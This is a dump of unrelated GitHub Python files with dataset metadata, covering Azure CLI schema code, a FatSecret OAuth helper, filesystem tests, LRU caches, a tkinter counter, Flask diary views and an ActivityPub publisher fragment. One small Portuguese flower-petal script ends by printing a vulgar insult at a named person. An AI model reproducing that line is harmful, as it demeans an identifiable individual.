cls._schema_on_200.properties.fabric_specific_settings\n fabric_specific_settings.instance_type = AAZStrType(\n serialized_name=\"instanceType\",\n flags={\"required\": True},\n )\n\n disc_azure_to_azure = cls._schema_on_200.properties.fabric_specific_settings.discriminate_by(\"instance_type\", \"AzureToAzure\")\n disc_azure_to_azure.primary_fabric_location = AAZStrType(\n serialized_name=\"primaryFabricLocation\",\n )\n disc_azure_to_azure.recovery_fabric_location = AAZStrType(\n serialized_name=\"recoveryFabricLocation\",\n )\n\n disc_vmm_to_azure = cls._schema_on_200.properties.fabric_specific_settings.discriminate_by(\"instance_type\", \"VmmToAzure\")\n disc_vmm_to_azure.location = AAZStrType()\n\n return cls._schema_on_200\n\n\nclass _CreateHelper:\n \"\"\"Helper class for Create\"\"\"\n\n\n__all__ = [\"Create\"]\n","repo_name":"Azure/azure-cli-extensions","sub_path":"src/site-recovery/azext_site_recovery/aaz/latest/site_recovery/network/mapping/_create.py","file_name":"_create.py","file_ext":"py","file_size_in_byte":13040,"program_lang":"python","lang":"en","doc_type":"code","stars":350,"dataset":"github-code","pt":"5"} +{"seq_id":"13807666395","text":"#!/usr/bin/env python3\n\nimport fatsecret as fs\nimport argparse\nimport yaml\n\n\ndef get_secrets(config):\n conn = fs.Fatsecret(**config)\n # Invoke OAuth for authorization and store the token and secret\n print(\"\\n\\n ------ Authorize your web function ------ \\n\\n\")\n print(\"Follow this link and authorize your API key to access your data.\")\n print(conn.get_authorize_url())\n config['session_token'] = conn.authenticate(input(\"\\nPIN: \"))\n return config\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Authorize and store FatSecret user token')\n parser.add_argument(\n 'consumer_key', type=str, help='FatSecret API Consumer Key')\n parser.add_argument(\n 'consumer_secret', type=str, help='FatSecret REST API Shared Secret')\n parser.add_argument(\n '--file',\n default='fs_credentials.yml',\n type=argparse.FileType('w'),\n help='credential storage file')\n args = parser.parse_args()\n config = {\n 'consumer_key': args.consumer_key,\n 'consumer_secret': args.consumer_secret\n }\n config = get_secrets(config)\n yaml.dump(config, 
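\n              # config now holds consumer_key, consumer_secret and the session_token collected above\n              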
args.file)\n","repo_name":"Cerebus/withings_fatsecret","sub_path":"store_keys.py","file_name":"store_keys.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"21130830750","text":"import logging\nfrom unittest import mock\n\nfrom constants import BLOCK_HEADER_SIZE_BYTES, BLOCK_SIZE_BYTES\nfrom fs.commands.close import CloseCommand\nfrom fs.commands.create import CreateCommand\nfrom fs.commands.link import LinkCommand\nfrom fs.commands.ls import LsCommand\nfrom fs.commands.open import OpenCommand\nfrom fs.commands.truncate import TruncateCommand\nfrom fs.commands.unlink import UnlinkCommand\nfrom fs.commands.write import WriteCommand\nfrom fs.driver.utils import form_header_from_bytes\nfrom tests.conftest import LOREM_IPSUM, FSBaseMountAndMkfsTestCase\n\n\nclass TestFSLab2(FSBaseMountAndMkfsTestCase):\n def test_create_file(self) -> None:\n filename = \"file1\"\n command = CreateCommand(path=filename)\n command.exec()\n\n resolved_path = command.resolve_path(filename)\n\n self.assertTrue(\n resolved_path.fs_object_path\n in command._system_state.get_path_to_descriptor_mapping()\n )\n self.get_file_descriptor(command, resolved_path.fs_object_path)\n\n def test_create_n_files(self) -> None:\n for i in range(5):\n filename = f\"file_{i}\"\n command = CreateCommand(path=filename)\n command.exec()\n\n resolved_path = command.resolve_path(filename)\n\n self.get_file_descriptor(command, resolved_path.fs_object_path)\n\n def test_ls_files(self) -> None:\n created_files = []\n\n for i in range(5):\n filename = f\"file_{i}\"\n\n CreateCommand(path=filename).exec()\n created_files.append(filename)\n\n command = LsCommand()\n\n with self._caplog.at_level(logging.INFO):\n command.exec()\n\n command_output = self._caplog.records[0].msg\n file_rows = [row for row in command_output.split(\"\\n\")[5:]]\n\n for i, file in enumerate(created_files):\n self.assertIn(file, file_rows[i])\n\n def test_link_file(self) -> None:\n filename = \"file1\"\n CreateCommand(path=filename).exec()\n\n link_filename = \"file1_link\"\n command = LinkCommand(path1=filename, path2=link_filename)\n command.exec()\n\n resolved_path = command.resolve_path(filename)\n file = self.get_file_descriptor(command, resolved_path.fs_object_path)\n\n link_resolved_path = command.resolve_path(filename)\n file_link = self.get_file_descriptor(command, link_resolved_path.fs_object_path)\n\n self.assertEqual(file.n, file_link.n)\n self.assertEqual(file.refs_count, 2)\n\n def test_unlink_file(self) -> None:\n filename = \"file1\"\n CreateCommand(path=filename).exec()\n\n link_filename = \"file1_link\"\n LinkCommand(path1=filename, path2=link_filename).exec()\n\n command = UnlinkCommand(path=link_filename)\n command.exec()\n\n link_resolved_path = command.resolve_path(link_filename)\n\n self.assertTrue(\n link_resolved_path.fs_object_path\n not in command._system_state.get_path_to_descriptor_mapping()\n )\n\n resolved_path = command.resolve_path(filename)\n\n file = self.get_file_descriptor(command, resolved_path.fs_object_path)\n self.assertEqual(file.refs_count, 1)\n\n def test_delete_file(self) -> None:\n filename = \"file1\"\n CreateCommand(path=filename).exec()\n\n command = UnlinkCommand(path=filename)\n resolved_path = command.resolve_path(filename)\n\n file_descriptor = command._system_state.get_descriptor_id(\n resolved_path.fs_object_path\n )\n self.assertIsNotNone(file_descriptor)\n\n file_descriptor_blocks = 
command._system_state.get_descriptor_blocks(\n file_descriptor\n )\n\n command.exec()\n\n file = command._memory_proxy.get_descriptor(\n file_descriptor, file_descriptor_blocks\n )\n\n self.assertEqual(file.refs_count, 0)\n\n with command._memory_proxy.memory as m:\n for block in file.blocks:\n m.seek(block.n * BLOCK_SIZE_BYTES)\n header_bytes = m.read(BLOCK_HEADER_SIZE_BYTES)\n\n header = form_header_from_bytes(header_bytes)\n\n self.assertFalse(header.used)\n self.assertEqual(header.ref_count, 0)\n\n def test_open_file(self) -> None:\n filename = \"file1\"\n CreateCommand(path=filename).exec()\n\n command = OpenCommand(path=filename)\n\n test_fd = 100\n\n # For getting predictable `fd` we should mock `random.randint` result.\n with mock.patch(\"random.randint\", lambda _x, _y: test_fd):\n command.exec()\n\n self.assertTrue(str(test_fd) in command._system_state.get_fd_to_path_mapping())\n\n resolved_path = command.resolve_path(filename)\n file = self.get_file_descriptor(command, resolved_path.fs_object_path)\n self.assertTrue(file.opened)\n\n def test_close_file(self) -> None:\n filename = \"file1\"\n CreateCommand(path=filename).exec()\n\n test_fd = 100\n\n # For getting predictable `fd` we should mock `random.randint` result.\n with mock.patch(\"random.randint\", lambda _x, _y: test_fd):\n OpenCommand(path=filename).exec()\n\n command = CloseCommand(fd=str(test_fd))\n command.exec()\n\n resolved_path = command.resolve_path(filename)\n file = self.get_file_descriptor(command, resolved_path.fs_object_path)\n self.assertFalse(file.opened)\n\n def test_write_file(self) -> None:\n filename = \"file1\"\n CreateCommand(path=filename).exec()\n\n test_fd = 100\n\n # For getting predictable `fd` we should mock `random.randint` result.\n with mock.patch(\"random.randint\", lambda _x, _y: test_fd):\n OpenCommand(path=filename).exec()\n\n test_content = \"hello_world\"\n\n command = WriteCommand(fd=str(test_fd), offset=0, content=test_content)\n command.exec()\n\n resolved_path = command.resolve_path(filename)\n file = self.get_file_descriptor(command, resolved_path.fs_object_path)\n self.assertEqual(file.size, len(test_content))\n\n content = file.read_content(len(test_content), offset=0)\n self.assertEqual(content, test_content)\n\n def test_write_large_data_to_file(self) -> None:\n filename = \"file1\"\n CreateCommand(path=filename).exec()\n\n test_fd = 100\n\n # For getting predictable `fd` we should mock `random.randint` result.\n with mock.patch(\"random.randint\", lambda _x, _y: test_fd):\n OpenCommand(path=filename).exec()\n\n command = WriteCommand(fd=str(test_fd), offset=3, content=LOREM_IPSUM)\n command.exec()\n\n resolved_path = command.resolve_path(filename)\n file = self.get_file_descriptor(command, resolved_path.fs_object_path)\n\n self.assertEqual(file.size, len(LOREM_IPSUM))\n\n content = file.read_content(len(LOREM_IPSUM), offset=3)\n self.assertEqual(content, LOREM_IPSUM)\n\n def test_truncate_size_down_file(self) -> None:\n filename = \"file1\"\n CreateCommand(path=filename).exec()\n\n test_fd = 100\n\n # For getting predictable `fd` we should mock `random.randint` result.\n with mock.patch(\"random.randint\", lambda _x, _y: test_fd):\n OpenCommand(path=filename).exec()\n\n WriteCommand(fd=str(test_fd), offset=0, content=LOREM_IPSUM).exec()\n\n test_truncate_size = len(LOREM_IPSUM) // 2\n\n command = TruncateCommand(path=filename, size=test_truncate_size)\n command.exec()\n\n resolved_path = command.resolve_path(filename)\n file = self.get_file_descriptor(command, 
resolved_path.fs_object_path)\n\n        content = file.read_content(file.size, offset=0)\n        self.assertEqual(content, LOREM_IPSUM[:test_truncate_size])\n\n    def test_truncate_size_up_file(self) -> None:\n        filename = \"file1\"\n        CreateCommand(path=filename).exec()\n\n        test_fd = 100\n\n        # For getting predictable `fd` we should mock `random.randint` result.\n        with mock.patch(\"random.randint\", lambda _x, _y: test_fd):\n            OpenCommand(path=filename).exec()\n\n        WriteCommand(fd=str(test_fd), offset=0, content=LOREM_IPSUM).exec()\n\n        test_truncate_size = len(LOREM_IPSUM) * 2\n\n        command = TruncateCommand(path=filename, size=test_truncate_size)\n        command.exec()\n\n        resolved_path = command.resolve_path(filename)\n        file = self.get_file_descriptor(command, resolved_path.fs_object_path)\n\n        self.assertEqual(file.size, len(LOREM_IPSUM))\n","repo_name":"n4mespace/labFileSystem","sub_path":"tests/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":8547,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"31810684981","text":"\nn_petalas = int(input('Indique o número de pétalas: '))\n\nbem_ou_mal = input('escolhe entre [B]em me quer ou [M]al me quer: ')\n\nif bem_ou_mal == 'B':\n    if n_petalas % 2 == 0:\n        print('Mal me quer')\n    else:\n        print('Bem me quer')\n\nelif bem_ou_mal == 'M':\n    if n_petalas % 2 == 0:\n        print('Bem me quer')\n    else:\n        print('Mal me quer')\n\n\nprint(\"Sara é uma filha da puta.\")\n\n","repo_name":"MarceloBrunerWeber/Python","sub_path":"CursoUdemy/Exercícios/tarefinha_do_citrix2.py","file_name":"tarefinha_do_citrix2.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36035999693","text":"\nclass Node:\n    \"\"\"\n    Node class with value and parent\n    \"\"\"\n    def __init__(self, value, parent=None):\n        self.value = value\n        self.parent = parent\n\n\n\ndef lca(node1, node2):\n    \"\"\"\n    The complexity of the solution is\n    Time: O(N), where N is the total number of nodes present in the tree. We are traversing the tree two times,\n    2*N in total, so the complexity is linear, and checking if an item is present in the set is constant time.\n\n    Space: O(N), where N is the total number of nodes. 
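The set holds at most the ancestors of node1, so it can reach size N on a degenerate chain-shaped tree. 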
We are storing the node values in a set to check for\n presence in the next traversal.\n\n :param node1: one node\n :param node2: another node\n :return:\n \"\"\"\n # traverse first node and store its parents\n path = set()\n while node1!=None:\n path.add(node1.value)\n node1 = node1.parent\n\n # traverse node 2 and if any parent match from the previous parents set then this is lca\n while node2!=None:\n if node2.value in path:\n break\n else:\n node2 = node2.parent\n\n print(f\"LCA {node2.value}\")\n","repo_name":"Mushahid2521/BongoWrittenTest","sub_path":"Q3_least_common_ancestor/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38327597431","text":"import numpy as np\r\n\r\n\r\nclass DensityDetector():\r\n def __init__(self):\r\n self.group_num = 5\r\n self.depth_coeff = 1\r\n\r\n def convertVector(self, pos_list):\r\n # [top, left, bottom, right]\r\n num_vector = len(pos_list)\r\n if num_vector == 0:\r\n return False\r\n pos_list = np.array(pos_list)\r\n\r\n pos_vector = np.zeros((num_vector, 5))\r\n # x position\r\n pos_vector[:, 0] = (pos_list[:, 1] + pos_list[:, 3]) / 2\r\n # y position\r\n pos_vector[:, 1] = (pos_list[:, 0] + pos_list[:, 2]) / 2\r\n # width\r\n pos_vector[:, 2] = abs(pos_list[:, 3] - pos_list[:, 1])\r\n # height\r\n for i in range(num_vector):\r\n pos_vector[i, 3] = abs(pos_list[i, 2] - pos_list[i, 0])\r\n if pos_vector[i, 3] < pos_vector[i, 2]:\r\n pos_vector[i, 3] = 4 * pos_vector[i, 2]\r\n # area\r\n pos_vector[i, 4] = pos_vector[i, 2] * pos_vector[i, 3]\r\n return pos_vector\r\n\r\n\r\n def groupDepth(self, area_dict):\r\n main_list = []\r\n main_list_range = []\r\n # dict {area: area_range}\r\n area_range = [[a*0.5, a*2] for a in area_dict.values()]\r\n area_range = dict(zip(area_dict.keys(), area_range))\r\n for key in area_dict:\r\n need_flag = True\r\n if main_list == []:\r\n main_list.append([key])\r\n main_list_range.append(area_range[key])\r\n else:\r\n for i, range in enumerate(main_list_range):\r\n if area_dict[key] > min(range) and area_dict[key] < max(range):\r\n main_list[i].append(key)\r\n main_list_range[i].append(area_range[key][0])\r\n main_list_range[i].append(area_range[key][1])\r\n need_flag = False\r\n else:\r\n continue\r\n if need_flag:\r\n main_list.append([key])\r\n main_list_range.append(area_range[key])\r\n return main_list\r\n\r\n\r\n def getGroup(self, x_dict, w_dict):\r\n main_list = []\r\n main_list_range = []\r\n dis_range = {}\r\n for key in x_dict:\r\n dis_range[key] = [x_dict[key]-w_dict[key], x_dict[key]+w_dict[key]]\r\n \r\n \r\n for key in x_dict:\r\n need_flag = True\r\n if main_list == []:\r\n main_list.append([key])\r\n main_list_range.append(dis_range[key])\r\n else:\r\n for i, range in enumerate(main_list_range):\r\n if x_dict[key] > min(range) and x_dict[key] < max(range):\r\n main_list[i].append(key)\r\n main_list_range[i].append(dis_range[key][0])\r\n main_list_range[i].append(dis_range[key][1])\r\n need_flag = False\r\n else:\r\n continue\r\n if need_flag:\r\n main_list.append([key])\r\n main_list_range.append(dis_range[key])\r\n return main_list\r\n\r\n \r\n def checkDensity(self, pos_list):\r\n vector_num = len(pos_list)\r\n pos_vector = self.convertVector(pos_list)\r\n area_list = (pos_vector[:, 4]).tolist()\r\n area_dict = dict(zip([i for i in range(vector_num)], area_list))\r\n area_dict = {k: v for k, v in sorted(area_dict.items(), key=lambda item: item[1])}\r\n depth_list 
= self.groupDepth(area_dict)\r\n        \r\n        main_list = []\r\n        for depth_block in depth_list:\r\n            temp_x_list = [pos_vector[i, 0] for i in depth_block]\r\n            temp_x_dict = dict(zip(depth_block, temp_x_list))\r\n            temp_x_dict = {k: v for k, v in sorted(temp_x_dict.items(), key=lambda item: item[1])}\r\n            temp_w_list = [pos_vector[i, 2] for i in depth_block]\r\n            temp_w_dict = dict(zip(depth_block, temp_w_list))\r\n            temp_block_list = self.getGroup(temp_x_dict, temp_w_dict)\r\n            for block in temp_block_list:\r\n                main_list.append(block)\r\n        return main_list\r\n    \r\n\r\nif __name__ == \"__main__\":\r\n    demo_list = np.array([[20, 70, 90, 90], [19, 71, 90, 90], [5, 10, 10, 13]])\r\n    demo = DensityDetector()\r\n    dense_list = demo.checkDensity(demo_list)","repo_name":"jiangshaoqi/Esp32imgCap","sub_path":"peopledense.py","file_name":"peopledense.py","file_ext":"py","file_size_in_byte":4344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35657180444","text":"import tkinter as tk\nimport time\n\nroot = tk.Tk()\n\nroot.title(\"Dukelska K.B.\")\nroot.geometry(\"680x560\")\n\nCounter = tk.IntVar()\nCounter.set(0)\nState = False\nM = 13\nN = 66\n\nlbl1 = tk.Label(root, text=\"State = {} \".format(State), font=(\"Arial\", 14))\nlbl1.grid(row=3, column=1)\nlabel1 = tk.Label(root, text='Counter={}'.format(Counter.get()), font=(\"Arial\", 14))\nlabel1.grid(row=1, column=1)\nlabel2 = tk.Label(root, text='Enter number M', font=(\"Arial\", 14))\nlabel2.grid(row=4, column=1)\n\ntxt = tk.Entry(root, width=20)\ntxt.grid(row=5, column=1)\n\nres = \"{}\".format(txt.get())\n\n\ndef entry(event):\n    global M\n    global Counter\n    current_time = time.strftime(\"%H:%M:%S\")\n    if txt.get().isdigit():\n        listbox.insert(tk.END, f\"Set to {txt.get()} with Entry at {current_time}\")\n        M=int(txt.get())\n        if int(txt.get())<=Counter.get():\n            label1.config(bg='red')\n        else:\n            label1.config(bg='white')\n\n\ntxt.bind(\"<Return>\", entry)  # pressing Enter applies the typed threshold M\n\n\ndef clicked():\n    global Counter\n    global N\n    global M\n    if Counter.get() < N:\n        Counter.set(Counter.get() + 1)\n        current_time = time.strftime(\"%H:%M:%S\")\n        listbox.insert(tk.END, f\"Grow with button on 1, current: {Counter.get()} at {current_time}\")\n    else:\n        Counter.set(Counter.get() + 0)\n        label1.config(bg='white')\n    if Counter.get() >= M:\n        label1.config(bg='red')\n    else:\n        label1.config(bg='white')\n    label1.config(text='Counter={}'.format(Counter.get()))\n\n    global State\n    State = not State\n    lbl1.config(text='State= {}'.format(State))\n\n\nscal = tk.Scale(root, orient=tk.HORIZONTAL, length=300, from_=0, to=N, tickinterval=4, resolution=4)\nscal.grid(row=3, column=1)\n\n\ndef scalFunc(event):\n    global Counter\n    Counter.set(scal.get())\n    current_time = time.strftime(\"%H:%M:%S\")\n    listbox.insert(tk.END, f\"Grow up with scal, current: {Counter.get()} at {current_time}\")\n    label1.config(text='Counter={}'.format(Counter.get()))\n    if scal.get() >= M:\n        label1.config(bg='red')\n    else:\n        label1.config(bg='white')\n    \n\n\nscal.bind(\"<ButtonRelease-1>\", scalFunc)  # update the counter once the slider is released\n\n\nbtn = tk.Button(root, text='Grow', bg='red',font=(\"Arial Bold\", 14), command=clicked)\nbtn.grid(row=2, column=1)\n\nlabel3 = tk.Label(root, text='Events', font=(\"Arial\", 14))\nlabel3.grid(row=6, column=1)\nlistbox = tk.Listbox(root, width=50, height=20)\nlistbox.grid(row=7, 
column=1)\n\n\nroot.mainloop()\n","repo_name":"KseniiaDukelska/smart-house","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29105647978","text":"from flask import Blueprint, render_template, request, flash, redirect, url_for\nfrom flask_login import login_required, current_user\n\nfrom app import db\nfrom app.models.diaries import Diary\nfrom app.views.users import login_manager\n\nlogin_manager.login_view = 'users.login'\n\ndiary_blueprint = Blueprint('diaries', __name__)\n\n\n@diary_blueprint.route('/')\n@login_required\ndef index():\n user_id = current_user.get_id()\n diaries = Diary.query.filter_by(user_id=user_id).order_by(Diary.created_date.desc()).all()\n\n return render_template('diaries/index.html', diaries=diaries)\n\n\n@diary_blueprint.route('/add', methods=['GET', 'POST'])\n@login_required\ndef add_diary():\n if request.method == 'POST' and 'title' in request.form:\n user_id = current_user.get_id()\n title = request.form.get('title')\n description = request.form.get('description')\n link = request.form.get('link')\n diary = add_diary_to_db(user_id, title, description, link)\n\n flash(f'Diary entry \\\"{diary.title}\\\" added')\n\n return redirect(url_for('diaries.index'))\n\n return render_template('diaries/add.html')\n\n\n@diary_blueprint.route('/edit/', methods=['GET', 'POST'])\n@login_required\ndef edit_diary(diary_id):\n diary = load_diary(diary_id)\n if request.method == 'POST':\n diary.title = request.form.get('title')\n diary.description = request.form.get('description')\n diary.link = request.form.get('link')\n db.session.commit()\n flash(f'Diary entry \\\"{diary.title}\\\" updated')\n\n return redirect(url_for('diaries.index'))\n\n return render_template('diaries/edit.html', diary=diary)\n\n\n@diary_blueprint.route('/delete/', methods=['GET', 'POST'])\n@login_required\ndef delete_diary(diary_id):\n diary = load_diary(diary_id)\n db.session.delete(diary)\n db.session.commit()\n flash(f'Diary entry \\\"{diary.title}\\\" deleted')\n\n return redirect(url_for('diaries.index'))\n\n\ndef add_diary_to_db(user_id, title, description, link):\n # noinspection PyArgumentList\n diary = Diary(user_id=user_id, title=title, description=description, link=link)\n db.session.add(diary)\n db.session.commit()\n\n return diary\n\n\ndef load_diary(diary_id):\n diary = Diary.query.filter_by(id=diary_id).first()\n\n return diary\n","repo_name":"Joeriksson/flask-code-diary","sub_path":"app/views/diaries.py","file_name":"diaries.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24531886515","text":"import csv\nimport sys\n\n# Vivian Cheng, 10-301 HW1 Programming: Decision Stump\n\ndef get_counts(i, review, vocab, feat_vec, label_dict, feature_flag): # fill counts\n label, all_words = review.split(\"\\t\")\n words = all_words.split(\" \")\n label_dict[i] = label\n for word in words: # skip label\n if vocab.get(word) or vocab.get(word) == 0:\n dict_index = vocab[word] # index of word in dictionary \n if feature_flag == '1':\n feat_vec[i][dict_index] = 1\n else:\n feat_vec[i][dict_index] = feat_vec[i].get(dict_index, 0) + 1\n\n\n\ndef fill_dict(dict):\n vocab = {}\n for d in dict:\n word, id = d.split()\n word, id = word.strip(), id.strip()\n vocab[word] = int(id)\n return vocab\n\ndef print_counts(feat_vec, label_dict, outfile):\n f = open(outfile, 
'w')\n    for i in range(len(feat_vec)):\n        if feat_vec[i] == {}: continue \n        f.write(\"%s\\t\" % label_dict[i])\n        k = 0\n        for key, value in feat_vec[i].items():\n            f.write('%s:%s' % (key, value))\n            k += 1\n            if k < len(feat_vec[i]):\n                f.write(\"\\t\")\n        f.write(\"\\n\")\n    f.close()\n\n\ndef filter_model_2(feat_vec):\n    for i in range(len(feat_vec)):\n        for key, value in list(feat_vec[i].items()):\n            if value >= 4:\n                del feat_vec[i][key]\n            else:\n                feat_vec[i][key] = 1\n    return feat_vec\n\n\n## Opens up csv file\ndef main(): \n    (program, trn_in, valid_in, test_in, dict_in, ftrn_out, fvalid_out, ftest_out, feature_flag) = sys.argv\n    # Parse dict \n    d = open(dict_in)\n    vocab = fill_dict(d)\n    # Parse movie reviews \n    files = [(trn_in, ftrn_out), (valid_in, fvalid_out), (test_in, ftest_out)]\n    for (in_file, out_file) in files:\n        # Parse movie reviews \n        feat_vec = {}\n        label_dict= {}\n        reviews = open(in_file, 'r')\n        if feature_flag == '1':\n            i = 0\n            for review in reviews:\n                feat_vec[i] = {} # initialize \n                get_counts(i, review, vocab, feat_vec, label_dict, feature_flag)\n                i += 1 \n            print_counts(feat_vec, label_dict, out_file)\n            #remove_tab(out_file)\n        elif feature_flag == '2':\n            i = 0\n            for review in reviews:\n                feat_vec[i] = {}\n                get_counts(i, review, vocab, feat_vec, label_dict, feature_flag)\n                i += 1\n            feat_vec = filter_model_2(feat_vec)\n            print_counts(feat_vec, label_dict, out_file)\n            #remove_tab(out_file)\n\n\n# def remove_tab(out_file):\n#     with open(out_file) as file:\n#         for line in file:\n#             line = line.lstrip()\n\nif __name__ == \"__main__\":\n    main()","repo_name":"vccheng2001/MachineLearningAlgorithms","sub_path":"LogisticRegression/feature.py","file_name":"feature.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"33665609448","text":"class ListNode:\n    def __init__(self, key=None, value=None):\n        self.key = key\n        self.value = value\n        self.prev = None\n        self.next = None\n\n\nclass LRUCache:\n    def __init__(self, capacity: int):\n        self.capacity = capacity\n        self.hashmap = {}\n        # Create two sentinel nodes, head and tail\n        self.head = ListNode()\n        self.tail = ListNode()\n        # Initialize the list as head <-> tail\n        self.head.next = self.tail\n        self.tail.prev = self.head\n\n    # Both get and put may need to move a node to the end of the doubly linked list, so define a helper\n    def move_node_to_tail(self, key):\n        # First unhook the node that hashmap[key] points to; call it node for brevity\n        #      hashmap[key]                               hashmap[key]\n        #           |                                          |\n        #           V        -->                               V\n        # prev <-> node <-> next         prev <-> next   ...   node\n        node = self.hashmap[key]\n        node.prev.next = node.next\n        node.next.prev = node.prev\n        # Then insert node right before the tail sentinel\n        #                 hashmap[key]                 hashmap[key]\n        #                      |                            |\n        #                      V        -->                 V\n        # prev <-> tail  ...  node              prev <-> node <-> tail\n        node.prev = self.tail.prev\n        node.next = self.tail\n        self.tail.prev.next = node\n        self.tail.prev = node\n\n    def get(self, key: int) -> int:\n        if key in self.hashmap:\n            # If it is already in the list, move it to the tail (it becomes the most recently accessed)\n            self.move_node_to_tail(key)\n        res = self.hashmap.get(key, -1)\n        if res == -1:\n            return res\n        else:\n            return res.value\n\n    def put(self, key: int, value: int) -> None:\n        if key in self.hashmap:\n            # If key is already in the hashmap, no new node needs to be added to the list,\n            # but the value of the node that the dict points to must be updated\n            self.hashmap[key].value = value\n            # Then move that node to the tail\n            self.move_node_to_tail(key)\n        else:\n            if len(self.hashmap) == self.capacity:\n                # Drop the corresponding hashmap entry\n                self.hashmap.pop(self.head.next.key)\n                # Drop the least recently accessed node, i.e. the one right after the head sentinel\n                self.head.next = self.head.next.next\n                self.head.next.prev = self.head\n            # If key is not present, insert the new node right before the tail sentinel\n            new = ListNode(key, value)\n            self.hashmap[key] = new\n            new.prev = self.tail.prev\n            new.next = self.tail\n            self.tail.prev.next = new\n            self.tail.prev = new\n\n\n\nclass DLinkedNode:\n    \"\"\"\n    Doubly linked list node\n    \"\"\"\n    def __init__(self, key: int = 0, value: int = 0):\n        self.prev = None\n        self.next = None\n        self.key = key\n        self.value = value\n    \nclass LRUCache:\n    \n    def __init__(self, capacity: int):\n        self.size = 0\n        self.capacity = capacity\n        self.cache = dict()\n        self.head = DLinkedNode()\n        self.tail = DLinkedNode()\n        self.head.next = self.tail\n        self.tail.prev = self.head\n    \n    def get(self, key: int) -> int:\n        # If key is not in the cache, return -1 directly\n        if key not in self.cache:\n            return -1\n        \n        # Fetch the node that key maps to in the cache\n        node = self.cache[key]\n        # Move the node to the head of the list\n        self.move_to_head(node)\n        # Return the node's value\n        return node.value\n    \n    def put(self, key: int, value: int) -> None:\n        \n        node = DLinkedNode(key, value)\n        \n        # If key is not in the cache\n        if key not in self.cache:\n            # and the cache is already at capacity\n            if self.capacity == self.size:\n                # remove the last node from the list\n                last_node = self.remove_last()\n                # and pop it from the cache as well\n                self.cache.pop(last_node.key)\n                # add the new node to the head of the list\n                self.add_to_head(node)\n                # update the cache\n                self.cache[key] = node\n            else:\n                # Capacity not reached yet: just add the new node to the head of the list \n                self.add_to_head(node)\n                # and update the cache as well\n                self.cache[key] = node\n                # the cache size grows by one\n                self.size += 1\n        else:\n            # If key is in the cache, capacity no longer needs to be considered.\n            # Remove the old node from the cache and the list,\n            old_node = self.cache.pop(key)\n            self.remove_node(old_node)\n            # then add the new node to both the cache and the list\n            self.add_to_head(node)\n            self.cache[key] = node\n    \n    def add_to_head(self, node: DLinkedNode):\n        \"\"\"\n        Add a node to the head of the list\n        \"\"\"\n        next_node = self.head.next\n        \n        self.head.next = node\n        node.prev = self.head\n        \n        node.next = next_node\n        next_node.prev = node\n    \n    def remove_node(self, node: DLinkedNode):\n        \"\"\"\n        Remove the given node from the list\n        \"\"\"\n        node.prev.next = node.next\n        node.next.prev = node.prev\n    \n    def move_to_head(self, node: DLinkedNode):\n        \"\"\"\n        Move a node to the head of the list\n        \"\"\"\n        self.remove_node(node)\n        self.add_to_head(node)\n    \n    def remove_last(self) -> DLinkedNode:\n        \"\"\"\n        Remove the last node in the list and return it\n        \"\"\"\n        last_node = self.tail.prev\n        \n        self.tail.prev.prev.next = self.tail\n        self.tail.prev = self.tail.prev.prev\n        return last_node\n    ","repo_name":"KuiyuanZhang/Leetcode-Train","sub_path":"Python_Struct/LRU.py","file_name":"LRU.py","file_ext":"py","file_size_in_byte":5948,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24337262326","text":"import aiohttp\nimport asyncio\nimport base64\nimport hashlib\nimport logging\nimport time\nimport urllib.parse\n\n\nfrom ..http_signatures import HTTPSignatureSigner\nfrom ..activity_streams import AS2Object, AS2Activity, AS2Pointer, AS2_PUBLIC\nfrom ..activity_streams.collection import AS2Collection\nfrom ..activity_pub.actor import 
Actor\n\n\nAS2_RECIPIENT = 1\nAP_INBOX = 2\nLOCAL_DELIVERY = 3\n\n\nclass PublisherRequest:\n def __init__(self, publisher, activity: AS2Activity, recipient: str, kind=AS2_RECIPIENT):\n self.publisher = publisher\n self.activity = activity\n self.recipient = recipient\n self.kind = kind\n self.error_count = 0\n self.complete = False\n self.originator = AS2Pointer(self.activity.actor).dereference()\n\n async def handle_local_delivery(self):\n obj = AS2Collection.fetch_local(self.recipient, use_pointers=True)\n\n if isinstance(obj, AS2Collection) and not obj.contains_uri(self.activity.id):\n obj.prepend(self.activity)\n obj.commit()\n\n asyncio.ensure_future(self.publisher.notify_listeners(obj.id, self.activity))\n\n return self.completed()\n\n def handle_public(self):\n if self.activity.__ephemeral__:\n return self.completed()\n\n self.publisher.add_activity(self.activity, self.publisher.app.shared_inbox_uri, LOCAL_DELIVERY)\n return self.completed()\n\n def handle_actor(self, actor: Actor):\n if actor.local() and not self.activity.__ephemeral__:\n self.publisher.add_activity(self.activity, actor.inbox, LOCAL_DELIVERY)\n return self.completed()\n\n if self.originator.local() or actor.local():\n self.publisher.add_activity(self.activity, actor.inbox, AP_INBOX)\n\n return self.completed()\n\n def handle_collection(self, obj: AS2Collection):\n if not self.activity.__ephemeral__:\n local = [self.publisher.add_activity(self.activity, actor.inbox, LOCAL_DELIVERY)\n for actor in obj.__items__ if isinstance(actor, Actor) and actor.local()]\n\n inboxes = set([actor.best_inbox() for actor in obj.__items__ if isinstance(actor, Actor) and actor.remote()])\n logging.info('PUBLISHER: Expanded collection %r to %r.', obj.id, inboxes)\n [self.publisher.add_activity(self.activity, inbox, AP_INBOX) for inbox in inboxes]\n return self.completed()\n\n async 